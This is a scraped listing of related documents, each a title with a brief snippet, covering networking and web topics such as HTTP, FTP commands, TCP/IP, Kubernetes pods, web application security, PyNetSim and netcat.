More informationINTERNET ENGINEERING. HTTP Protocol. Sadegh Aliakbary
INTERNET ENGINEERING HTTP Protocol Sadegh Aliakbary Agenda HTTP Protocol HTTP Methods HTTP Request and Response State in HTTP Internet Engineering 2 HTTP HTTP Hyper-Text Transfer Protocol (HTTP) The fundamental
More informationFtp Command Line Commands Linux Example Windows Put
Ftp Command Line Commands Linux Example Windows Put Examples of typical uses of the command ftp. This lists the commands that you can use to show the directory contents, transfer files, and delete files.
More informationCOSC 2206 Internet Tools. The HTTP Protocol
COSC 2206 Internet Tools The HTTP Protocol http://www.w3.org/protocols/ What is TCP/IP? TCP: Transmission Control Protocol IP: Internet Protocol These network protocols provide a standard method for sending
More informationCS 43: Computer Networks. Layering & HTTP September 7, 2018
CS 43: Computer Networks Layering & HTTP September 7, 2018 Last Class: Five-layer Internet Model Application: the application (e.g., the Web, Email) Transport: end-to-end connections, reliability Network:
More informationChapter 2: outline. 2.6 P2P applications 2.7 socket programming with UDP and TCP
Chapter 2: outline 2.1 principles of network applications 2.2 Web and HTTP 2.3 FTP 2.4 electronic mail SMTP, POP3, IMAP 2.5 DNS 2.6 P2P applications 2.7 socket programming with UDP and TCP Application
More informationExcerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt
Excerpts of Web Application Security focusing on Data Validation adapted for F.I.S.T. 2004, Frankfurt by fs Purpose of this course: 1. Relate to WA s and get a basic understanding of them 2. Understand
More informationWorld-Wide Web Protocols CS 571 Fall Kenneth L. Calvert All rights reserved
World-Wide Web Protocols CS 571 Fall 2006 2006 Kenneth L. Calvert All rights reserved World-Wide Web The Information Universe World-Wide Web structure: hypertext Nonlinear presentation of information Key
More informationCreating a Multi-Container Pod
CHAPTER 13 Creating a Multi-Container Pod A Pod is the atomic unit of an application managed by Kubernetes. A Pod has a single filesystem and IP Address; the containers in the Pod share the filesystem
More informationOutline of Lecture 3 Protocols
Web-Based Information Systems Fall 2007 CMPUT 410: Protocols Dr. Osmar R. Zaïane University of Alberta Course Content Introduction Internet and WWW TML and beyond Animation & WWW CGI & TML Forms Javascript
More informationPyNetSim A modern INetSim Replacement. Jason Jones FIRST 2017
PyNetSim A modern INetSim Replacement Jason Jones FIRST 2017 BackGround Why? Research teams may need a simulated environment because They are not allowed to directly contact malware C2s Trying to avoid
More informationAIM Enterprise Platform Software IBM z/transaction Processing Facility Enterprise Edition 1.1.0
z/tpf EE V1.1 z/tpfdf V1.1 TPF Toolkit for WebSphere Studio V3 TPF Operations Server V1.2 IBM Software Group TPF Users Group Spring 2007 TPF Users Group Spring 2007 z/tpf Web Services Update Name: Barry
More informationnetcat Johannes Franken
netcat Johannes Franken On this page I show example uses of netcat - a command line tool to create network connections over tcp or udp. Contents 1. Intended purpose 2. Usage as client
More information